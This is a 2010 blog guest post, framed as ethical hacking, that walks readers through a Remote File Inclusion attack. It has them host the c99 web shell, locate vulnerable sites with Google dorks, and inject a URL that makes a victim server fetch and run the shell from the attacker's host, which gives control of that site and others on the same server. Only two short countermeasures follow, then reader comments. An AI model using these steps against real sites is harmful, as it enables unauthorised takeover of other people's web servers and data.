Basics of RFI (Remote File Inclusion) with Tutorial

I recommend readers if they abide by the blog's Disclaimer then they can proceed reading this post otherwise leave this page immediately.
Before starting this tutorial, I would like to tell you about a piece of code called as shell.
There are many shells available . Lets consider a shell known as c99 shell.
First download it from here.

*Now signup for a account on any free web hosting site . Say 110mb.com.

*Now sign into your account,go to File manager, upload some files
*Then upload c99 through file manager.Now just log out and visit the URL of shell you uploaded http://username.110mb.com/shell.php and you will find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.But save the shell as shell.txt.Shell.php is shown above to make the readers know how we can view the content of filemanager without knowing the password and it is tried on the shell's mother file manager.

*Both images are showing the filemanager, In 1st I am accesing by signing into my account and 2nd just by accessing shell without logging into.
I just wanted to show you that Imagine if anybody somehow upload this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.
Note:Your account might get suspended after uploading such shells.

What is Remote File Inclusion ?


As clear from the name, Remote File inclusion means 'including a remote file'.RFI is a vulnerability found in
websites that allow attackers to include a remote file on to the web server. This may lead to remote code execution and completely compromise the system.

How to perform attack ?

Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it
as text file and upload it. Note down the complete path of your shell.

Step 2. Search for the vulnerable site using google dorks like
inurl:index.php?id=
inurl:index.php?page=

Download the list here.

You can use automated tools for the same.

Step3. Lets say you got any site like

http://www.victim.com/index.php?page=anything

Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

Note:At the last of the above url we have put a "?" because to make the web server treat "yourshell.txt" file as a .php file not a .txt file.

Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with
victim's site or may be even with other sites running on same web server by simply accessing your shell.

Possible Countermeasures :

1. Strongly validate the user's input.

2. Disable allow_url_fopen , allow_url_include,Register_global files in php.ini

About Author:
This is Guest Post by Aneesh M.Makker , a Ethical Hacking enthusiast and a fine person from Punjab,India .Connect with him on Facebook.(Profile)

Read his previous post  "XSS and BYPASSING A FILTER" on SecurityHunk.
Basics of RFI (Remote File Inclusion) with Tutorial Basics of RFI (Remote File Inclusion)  with Tutorial Reviewed by Satyajit (Admins,a.k.a Satosys) on Friday, November 26, 2010 Rating: 5

7 comments:

Mia Glam said...

thanks for the information is very useful!

Akash said...

thanks for sharing information for your blog and very nice blog site i really impressed

Shubham said...

I knew this attack, but I must say excellent post

Aneesh said...

Thanx guyz, Stay tuned for more posts :)

Ali Bawazeer said...

thanks but i'd like to tell you this kind of attack is almost not any more
if you look at the new version of appache of php
know the most command attacks is used by sql injunction

thanks bro

Anonymous said...

i know this rfi
but a good one post
carry on sir

Denver Sky said...

I’m really loving the template/theme of this blog. It’s simple, yet effective. A lot of times it’s challenging to get that “perfect balance” between user friendliness and appearance.

Powered by Blogger.